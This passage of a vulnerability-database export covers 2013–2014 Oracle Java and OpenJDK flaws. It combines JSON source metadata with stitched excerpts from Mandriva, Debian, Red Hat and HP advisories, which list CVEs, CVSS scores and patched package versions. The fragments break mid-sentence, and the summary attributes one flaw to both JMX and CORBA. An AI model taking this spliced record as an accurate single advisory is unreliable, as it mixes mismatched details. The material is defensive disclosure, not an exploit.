"https://rhn.redhat.com/errata/rhsa-2014-0408.html" } ], "sources": [ { "db": "VULHUB", "id": "VHN-67953" }, { "db": "BID", "id": "66916" }, { "db": "PACKETSTORM", "id": "126611" }, { "db": "PACKETSTORM", "id": "126182" }, { "db": "PACKETSTORM", "id": "130400" }, { "db": "PACKETSTORM", "id": "127655" }, { "db": "PACKETSTORM", "id": "127938" }, { "db": "PACKETSTORM", "id": "126664" }, { "db": "PACKETSTORM", "id": "127939" }, { "db": "PACKETSTORM", "id": "126630" }, { "db": "PACKETSTORM", "id": "126183" }, { "db": "CNNVD", "id": "CNNVD-201404-275" }, { "db": "NVD", "id": "CVE-2014-0460" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "VULHUB", "id": "VHN-67953" }, { "db": "BID", "id": "66916" }, { "db": "PACKETSTORM", "id": "126611" }, { "db": "PACKETSTORM", "id": "126182" }, { "db": "PACKETSTORM", "id": "130400" }, { "db": "PACKETSTORM", "id": "127655" }, { "db": "PACKETSTORM", "id": "127938" }, { "db": "PACKETSTORM", "id": "126664" }, { "db": "PACKETSTORM", "id": "127939" }, { "db": "PACKETSTORM", "id": "126630" }, { "db": "PACKETSTORM", "id": "126183" }, { "db": "CNNVD", "id": "CNNVD-201404-275" }, { "db": "NVD", "id": "CVE-2014-0460" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-04-16T00:00:00", "db": "VULHUB", "id": "VHN-67953" }, { "date": "2014-04-15T00:00:00", "db": "BID", "id": "66916" }, { "date": "2014-05-14T15:09:44", "db": "PACKETSTORM", "id": "126611" }, { "date": "2014-04-16T20:42:08", "db": "PACKETSTORM", "id": "126182" }, { "date": "2015-02-16T17:24:02", "db": "PACKETSTORM", "id": "130400" }, { "date": "2014-07-29T22:17:21", "db": "PACKETSTORM", "id": "127655" }, { "date": "2014-08-20T15:19:26", "db": "PACKETSTORM", "id": "127938" }, { "date": "2014-05-19T03:11:59", "db": "PACKETSTORM", "id": "126664" }, { "date": "2014-08-20T15:19:50", "db": "PACKETSTORM", "id": "127939" }, { "date": "2014-05-15T21:38:36", "db": "PACKETSTORM", "id": "126630" }, { "date": "2014-04-16T20:42:18", "db": "PACKETSTORM", "id": "126183" }, { "date": "2014-04-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201404-275" }, { "date": "2014-04-16T01:55:09.993000", "db": "NVD", "id": "CVE-2014-0460" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2022-05-09T00:00:00", "db": "VULHUB", "id": "VHN-67953" }, { "date": "2015-05-07T17:18:00", "db": "BID", "id": "66916" }, { "date": "2020-10-23T00:00:00", "db": "CNNVD", "id": "CNNVD-201404-275" }, { "date": "2022-05-13T14:57:20.570000", "db": "NVD", "id": "CVE-2014-0460" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "126182" }, { "db": "PACKETSTORM", "id": "127938" }, { "db": "PACKETSTORM", "id": "126664" }, { "db": "PACKETSTORM", "id": "127939" }, { "db": "PACKETSTORM", "id": "126183" }, { "db": "CNNVD", "id": "CNNVD-201404-275" } ], "trust": 1.1 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Oracle Java SE/JRockit/Java SE Embedded Security hole", "sources": [ { "db": "CNNVD", "id": "CNNVD-201404-275" } ], "trust": 0.6 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "other", "sources": [ { "db": "CNNVD", "id": "CNNVD-201404-275" } ], "trust": 0.6 } }
var-201306-0264
Vulnerability from variot
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier, 6 Update 45 and earlier, and 5.0 Update 45 and earlier, and OpenJDK 7, allows remote attackers to affect integrity via vectors related to JMX. NOTE: the previous information is from the June 2013 CPU. Oracle has not commented on claims from another vendor that this issue is due to an incorrect implementation of "certain class checks" that allows remote attackers to bypass intended class restrictions. The vulnerability can be exploited over multiple protocols. This issue affects the 'CORBA' sub-component. This vulnerability affects the following supported versions: 7 Update 21 , 6 Update 45 , 5.0 Update 45.
This updates IcedTea6 to version 1.11.12, which fixes these issues, as well as several other bugs.
Additionally, this OpenJDK update causes icedtea-web, the Java browser plugin, to crash, so icedtea-web has been patched to fix this. The verification of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
iD8DBQFR47+cmqjQ0CJFipgRAmnTAJ4lalit4V4VWsSE6KHeem9qtHb+9gCgmJ/U GUelRnMi6Rq7d9NhnTCwrlg= =rErU -----END PGP SIGNATURE----- .
For the stable distribution (wheezy), these problems have been fixed in version 7u25-2.3.10-1~deb7u1. In addition icedtea-web needed to be updated to 1.4-3~deb7u1.
For the unstable distribution (sid), these problems have been fixed in version 7u25-2.3.10-1. Further information about these flaws can be found on the Oracle Java SE Critical Patch Update Advisory pages, listed in the References section. should be restricted package (CORBA, 8025022) 1053495 - CVE-2014-0410 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment) 1053496 - CVE-2014-0415 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment) 1053499 - CVE-2013-5889 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment) 1053501 - CVE-2014-0417 Oracle JDK: unspecified vulnerability fixed in 5.0u71, 6u71 and 7u51 (2D) 1053502 - CVE-2014-0387 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment) 1053504 - CVE-2014-0424 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment) 1053507 - CVE-2014-0403 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment) 1053508 - CVE-2014-0375 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment) 1053509 - CVE-2013-5905 Oracle JDK: unspecified vulnerability fixed in 5.0u71, 6u71 and 7u51 (Install) 1053510 - CVE-2013-5906 Oracle JDK: unspecified vulnerability fixed in 5.0u71, 6u71 and 7u51 (Install) 1053512 - CVE-2013-5902 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment) 1053513 - CVE-2014-0418 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment) 1053515 - CVE-2013-5887 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment) 1053516 - CVE-2013-5899 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment) 1053517 - CVE-2013-5888 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment) 1053518 - CVE-2013-5898 Oracle JDK: unspecified vulnerability fixed in 6u71 and 7u51 (Deployment) 1060907 - CVE-2014-1876 OpenJDK: insecure temporary file use in unpack200 (Libraries, 8033618) 1086632 - CVE-2014-2398 OpenJDK: insufficient escaping of window title string (Javadoc, 8026736) 1086645 - CVE-2014-0453 OpenJDK: RSA unpadding timing issues (Security, 8027766) 1087409 - CVE-2014-0429 OpenJDK: Incorrect mlib/raster image validation (2D, 8027841) 1087411 - CVE-2014-0457 OpenJDK: ServiceLoader Exception handling security bypass (Libraries, 8031394) 1087413 - CVE-2014-0456 OpenJDK: System.arraycopy() element race condition (Hotspot, 8029858) 1087417 - CVE-2014-2421 OpenJDK: JPEG decoder input stream handling (2D, 8029854) 1087426 - CVE-2014-0461 OpenJDK: Better ScriptEngineManager ScriptEngine management (Libraries, 8036794) 1087427 - CVE-2014-2412 OpenJDK: AWT thread context handling (AWT, 8025010) 1087428 - CVE-2014-0451 OpenJDK: AWT incorrect FlavorMap seperation (AWT, 8026797) 1087430 - CVE-2014-0458 OpenJDK: Activation framework default command map caching (JAX-WS, 8025152) 1087431 - CVE-2014-2414 OpenJDK: incorrect caching of data initialized via TCCL (JAXB, 8025030) 1087434 - CVE-2014-2423 OpenJDK: incorrect caching of data initialized via TCCL (JAXWS, 8026188) 1087436 - CVE-2014-0452 OpenJDK: incorrect caching of data initialized via TCCL (JAXWS, 8026801) 1087439 - CVE-2014-0446 OpenJDK: Protect logger handlers (Libraries, 8029740) 1087441 - CVE-2014-2427 OpenJDK: remove insecure Java Sound provider caching (Sound, 8026163) 1087442 - CVE-2014-0460 OpenJDK: missing randomization of JNDI DNS client query IDs (JNDI, 8030731) 1087443 - CVE-2014-2403 OpenJDK: JAXP CharInfo file access restriction (JAXP, 8029282) 1088025 - CVE-2014-2428 Oracle JDK: unspecified vulnerability fixed in 6u75, 7u55 and 8u5 (Deployment) 1088027 - CVE-2014-2409 Oracle JDK: unspecified vulnerability fixed in 6u75, 7u55 and 8u5 (Deployment) 1088028 - CVE-2014-0449 Oracle JDK: unspecified vulnerability fixed in 6u75, 7u55 and 8u5 (Deployment) 1088030 - CVE-2014-2401 Oracle JDK: unspecified vulnerability fixed in 5.0u75, 6u75, 7u55 and 8u5 (2D) 1088031 - CVE-2014-2420 Oracle JDK: unspecified vulnerability fixed in 6u75, 7u55 and 8u5 (Deployment)
- In a typical operating environment, these are of low security risk as the runtime is not used on untrusted applets. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03874547
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c03874547 Version: 1
HPSBUX02908 rev.1 - HP-UX Running Java6, Remote Unauthorized Access, Disclosure of Information, and Other Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2013-07-31 Last Updated: 2013-07-31
Potential Security Impact: Remote unauthorized access, disclosure of information, and other vulnerabilities
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified in the Java Runtime Environment (JRE) and the Java Developer Kit (JDK) running on HP-UX.
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.11, B.11.23, and B.11.31 running HP JDK and JRE v6.0.19 and earlier.
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2013-1500 (AV:L/AC:L/Au:N/C:P/I:P/A:N) 3.6 CVE-2013-1571 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2013-2407 (AV:N/AC:L/Au:N/C:P/I:N/A:P) 6.4 CVE-2013-2412 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-2433 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2013-2437 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-2442 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2013-2444 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2013-2445 (AV:N/AC:L/Au:N/C:N/I:N/A:C) 7.8 CVE-2013-2446 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-2447 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-2448 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6 CVE-2013-2450 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2013-2451 (AV:L/AC:H/Au:N/C:P/I:P/A:P) 3.7 CVE-2013-2452 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-2453 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2013-2454 (AV:N/AC:M/Au:N/C:P/I:P/A:N) 5.8 CVE-2013-2455 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-2456 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2013-2457 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2013-2459 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2461 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2013-2463 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2464 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2465 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2466 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2468 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2469 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2470 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2471 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2472 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-2473 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2013-3743 (AV:N/AC:M/Au:N/C:C/I:C/A:C) 9.3 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following Java version upgrade to resolve these vulnerabilities.
The upgrade is available from the following location
http://www.hp.com/java
OS Version Release Version
HP-UX B.11.11, B.11.23, B.11.31 JDK and JRE v6.0.20 or subsequent
MANUAL ACTIONS: Yes - Update For Java v6.0 update to Java v6.0.20 or subsequent PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.11 HP-UX B.11.23 =========== Jdk60.JDK60-COM Jdk60.JDK60-PA20 Jdk60.JDK60-PA20W Jre60.JRE60-COM Jre60.JRE60-COM-DOC Jre60.JRE60-PA20 Jre60.JRE60-PA20-HS Jre60.JRE60-PA20W Jre60.JRE60-PA20W-HS Jdk60.JDK60-IPF32 Jdk60.JDK60-IPF64 Jre60.JRE60-COM Jre60.JRE60-IPF32 Jre60.JRE60-IPF32-HS Jre60.JRE60-IPF64 Jre60.JRE60-IPF64-HS action: install revision 1.6.0.20.00 or subsequent
HP-UX B.11.23 HP-UX B.11.31 =========== Jdk60.JDK60-COM Jdk60.JDK60-IPF32 Jdk60.JDK60-IPF64 Jre60.JRE60-IPF32 Jre60.JRE60-IPF32-HS Jre60.JRE60-IPF64 Jre60.JRE60-IPF64-HS Jre60.JRE60-COM Jre60.JRE60-IPF32 Jre60.JRE60-IPF32-HS Jre60.JRE60-IPF64 Jre60.JRE60-IPF64-HS action: install revision 1.6.0.20.00 or subsequent
END AFFECTED VERSIONS
HISTORY Version:1 (rev.1) - 31 July 2013 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2013 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Critical: java-1.7.0-openjdk security update Advisory ID: RHSA-2013:0957-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-0957.html Issue date: 2013-06-19 CVE Names: CVE-2013-1500 CVE-2013-1571 CVE-2013-2407 CVE-2013-2412 CVE-2013-2443 CVE-2013-2444 CVE-2013-2445 CVE-2013-2446 CVE-2013-2447 CVE-2013-2448 CVE-2013-2449 CVE-2013-2450 CVE-2013-2452 CVE-2013-2453 CVE-2013-2454 CVE-2013-2455 CVE-2013-2456 CVE-2013-2457 CVE-2013-2458 CVE-2013-2459 CVE-2013-2460 CVE-2013-2461 CVE-2013-2463 CVE-2013-2465 CVE-2013-2469 CVE-2013-2470 CVE-2013-2471 CVE-2013-2472 CVE-2013-2473 =====================================================================
- Summary:
Updated java-1.7.0-openjdk packages that fix various security issues are now available for Red Hat Enterprise Linux 6.
The Red Hat Security Response Team has rated this update as having critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - noarch, x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, noarch, x86_64
- Description:
These packages provide the OpenJDK 7 Java Runtime Environment and the OpenJDK 7 Software Development Kit.
Multiple flaws were discovered in the ImagingLib and the image attribute, channel, layout and raster processing in the 2D component. An untrusted Java application or applet could possibly use these flaws to trigger Java Virtual Machine memory corruption. (CVE-2013-2470, CVE-2013-2471, CVE-2013-2472, CVE-2013-2473, CVE-2013-2463, CVE-2013-2465, CVE-2013-2469)
Integer overflow flaws were found in the way AWT processed certain input. An attacker could use these flaws to execute arbitrary code with the privileges of the user running an untrusted Java applet or application. (CVE-2013-2459)
Multiple improper permission check issues were discovered in the Sound, JDBC, Libraries, JMX, and Serviceability components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions. (CVE-2013-2448, CVE-2013-2454, CVE-2013-2458, CVE-2013-2457, CVE-2013-2453, CVE-2013-2460)
Multiple flaws in the Serialization, Networking, Libraries and CORBA components can be exploited by an untrusted Java application or applet to gain access to potentially sensitive information. (CVE-2013-2456, CVE-2013-2447, CVE-2013-2455, CVE-2013-2452, CVE-2013-2443, CVE-2013-2446)
It was discovered that the Hotspot component did not properly handle out-of-memory errors. An untrusted Java application or applet could possibly use these flaws to terminate the Java Virtual Machine. (CVE-2013-2445)
It was discovered that the AWT component did not properly manage certain resources and that the ObjectStreamClass of the Serialization component did not properly handle circular references. An untrusted Java application or applet could possibly use these flaws to cause a denial of service. (CVE-2013-2444, CVE-2013-2450)
It was discovered that the Libraries component contained certain errors related to XML security and the class loader. A remote attacker could possibly exploit these flaws to bypass intended security mechanisms or disclose potentially sensitive information and cause a denial of service. (CVE-2013-2407, CVE-2013-2461)
It was discovered that JConsole did not properly inform the user when establishing an SSL connection failed. An attacker could exploit this flaw to gain access to potentially sensitive information. (CVE-2013-2412)
It was discovered that GnomeFileTypeDetector did not check for read permissions when accessing files. An untrusted Java application or applet could possibly use this flaw to disclose potentially sensitive information. (CVE-2013-2449)
It was found that documentation generated by Javadoc was vulnerable to a frame injection attack. If such documentation was accessible over a network, and a remote attacker could trick a user into visiting a specially-crafted URL, it would lead to arbitrary web content being displayed next to the documentation. This could be used to perform a phishing attack by providing frame content that spoofed a login form on the site hosting the vulnerable documentation. (CVE-2013-1571)
It was discovered that the 2D component created shared memory segments with insecure permissions. A local attacker could use this flaw to read or write to the shared memory segment. (CVE-2013-1500)
Red Hat would like to thank Tim Brown for reporting CVE-2013-1500, and US-CERT for reporting CVE-2013-1571. US-CERT acknowledges Oracle as the original reporter of CVE-2013-1571.
Note: If the web browser plug-in provided by the icedtea-web package was installed, the issues exposed via Java applets could have been exploited without user interaction if a user visited a malicious website.
After installing this update, users of icedtea-web must install RHBA-2013:0959 for icedtea-web to continue functioning.
This erratum also upgrades the OpenJDK package to IcedTea7 2.3.10. Refer to the NEWS file, linked to in the References, for further information.
- Solution:
All users of java-1.7.0-openjdk are advised to upgrade to these updated packages, which resolve these issues. All running instances of OpenJDK Java must be restarted for the update to take effect.
Before applying this update, make sure all previously-released errata relevant to your system have been applied.
This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/knowledge/articles/11258
- Bugs fixed (http://bugzilla.redhat.com/):
973474 - CVE-2013-1571 OpenJDK: Frame injection in generated HTML (Javadoc, 8012375) 975099 - CVE-2013-2470 OpenJDK: ImagingLib byte lookup processing (2D, 8011243) 975102 - CVE-2013-2471 OpenJDK: Incorrect IntegerComponentRaster size checks (2D, 8011248) 975107 - CVE-2013-2472 OpenJDK: Incorrect ShortBandedRaster size checks (2D, 8011253) 975110 - CVE-2013-2473 OpenJDK: Incorrect ByteBandedRaster size checks (2D, 8011257) 975115 - CVE-2013-2463 OpenJDK: Incorrect image attribute verification (2D, 8012438) 975118 - CVE-2013-2465 OpenJDK: Incorrect image channel verification (2D, 8012597) 975120 - CVE-2013-2469 OpenJDK: Incorrect image layout verification (2D, 8012601) 975121 - CVE-2013-2459 OpenJDK: Various AWT integer overflow checks (AWT, 8009071) 975122 - CVE-2013-2460 OpenJDK: tracing insufficient access checks (Serviceability, 8010209) 975124 - CVE-2013-2445 OpenJDK: Better handling of memory allocation errors (Hotspot, 7158805) 975125 - CVE-2013-2448 OpenJDK: Better access restrictions (Sound, 8006328) 975126 - CVE-2013-2461 OpenJDK: Missing check for valid DOMCanonicalizationMethod canonicalization algorithm (Libraries, 8014281) 975127 - CVE-2013-2407 OpenJDK: Integrate Apache Santuario, rework class loader (Libraries, 6741606, 8008744) 975129 - CVE-2013-2454 OpenJDK: SerialJavaObject package restriction (JDBC, 8009554) 975130 - CVE-2013-2458 OpenJDK: Method handles (Libraries, 8009424) 975131 - CVE-2013-2444 OpenJDK: Resource denial of service (AWT, 8001038) 975132 - CVE-2013-2446 OpenJDK: output stream access restrictions (CORBA, 8000642) 975133 - CVE-2013-2457 OpenJDK: Proper class checking (JMX, 8008120) 975134 - CVE-2013-2453 OpenJDK: MBeanServer Introspector package access (JMX, 8008124) 975137 - CVE-2013-2443 OpenJDK: AccessControlContext check order issue (Libraries, 8001330) 975138 - CVE-2013-2452 OpenJDK: Unique VMIDs(Libraries, 8001033) 975139 - CVE-2013-2455 OpenJDK: getEnclosing* checks (Libraries, 8007812) 975140 - CVE-2013-2447 OpenJDK: Prevent revealing the local address (Networking, 8001318) 975141 - CVE-2013-2450 OpenJDK: ObjectStreamClass circular reference denial of service (Serialization, 8000638) 975142 - CVE-2013-2456 OpenJDK: ObjectOutputStream access checks (Serialization, 8008132) 975144 - CVE-2013-2412 OpenJDK: JConsole SSL support (Serviceability, 8003703) 975145 - CVE-2013-2449 OpenJDK: GnomeFileTypeDetector path access check(Libraries, 8004288) 975148 - CVE-2013-1500 OpenJDK: Insecure shared memory permissions (2D, 8001034)
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.25-2.3.10.3.el6_4.src.rpm
i386: java-1.7.0-openjdk-1.7.0.25-2.3.10.3.el6_4.i686.rpm java-1.7.0-openjdk-debuginfo-1.7.0.25-2.3.10.3.el6_4.i686.rpm
x86_64: java-1.7.0-openjdk-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Client/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.25-2.3.10.3.el6_4.src.rpm
i386: java-1.7.0-openjdk-debuginfo-1.7.0.25-2.3.10.3.el6_4.i686.rpm java-1.7.0-openjdk-demo-1.7.0.25-2.3.10.3.el6_4.i686.rpm java-1.7.0-openjdk-devel-1.7.0.25-2.3.10.3.el6_4.i686.rpm java-1.7.0-openjdk-src-1.7.0.25-2.3.10.3.el6_4.i686.rpm
noarch: java-1.7.0-openjdk-javadoc-1.7.0.25-2.3.10.3.el6_4.noarch.rpm
x86_64: java-1.7.0-openjdk-debuginfo-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm java-1.7.0-openjdk-demo-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm java-1.7.0-openjdk-devel-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm java-1.7.0-openjdk-src-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.25-2.3.10.3.el6_4.src.rpm
x86_64: java-1.7.0-openjdk-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6ComputeNode/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.25-2.3.10.3.el6_4.src.rpm
noarch: java-1.7.0-openjdk-javadoc-1.7.0.25-2.3.10.3.el6_4.noarch.rpm
x86_64: java-1.7.0-openjdk-debuginfo-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm java-1.7.0-openjdk-demo-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm java-1.7.0-openjdk-devel-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm java-1.7.0-openjdk-src-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.25-2.3.10.3.el6_4.src.rpm
i386: java-1.7.0-openjdk-1.7.0.25-2.3.10.3.el6_4.i686.rpm java-1.7.0-openjdk-debuginfo-1.7.0.25-2.3.10.3.el6_4.i686.rpm java-1.7.0-openjdk-devel-1.7.0.25-2.3.10.3.el6_4.i686.rpm
x86_64: java-1.7.0-openjdk-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm java-1.7.0-openjdk-devel-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Server/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.25-2.3.10.3.el6_4.src.rpm
i386: java-1.7.0-openjdk-debuginfo-1.7.0.25-2.3.10.3.el6_4.i686.rpm java-1.7.0-openjdk-demo-1.7.0.25-2.3.10.3.el6_4.i686.rpm java-1.7.0-openjdk-src-1.7.0.25-2.3.10.3.el6_4.i686.rpm
noarch: java-1.7.0-openjdk-javadoc-1.7.0.25-2.3.10.3.el6_4.noarch.rpm
x86_64: java-1.7.0-openjdk-debuginfo-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm java-1.7.0-openjdk-demo-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm java-1.7.0-openjdk-src-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: ftp://ftp.redhat.com/pub/redhat/linux/enterprise/6Workstation/en/os/SRPMS/java-1.7.0-openjdk-1.7.0.25-2.3.10.3.el6_4.src.rpm
i386: java-1.7.0-openjdk-1.7.0.25-2.3.10.3.el6_4.i686.rpm java-1.7.0-openjdk-debuginfo-1.7.0.25-2.3.10.3.el6_4.i686.rpm java-1.7.0-openjdk-devel-1.7.0.25-2.3.10.3.el6_4.i686.rpm
x86_64: java-1.7.0-openjdk-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm java-1.7.0-openjdk-devel-1.7.0.25-2.3.10.3.el6_4.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
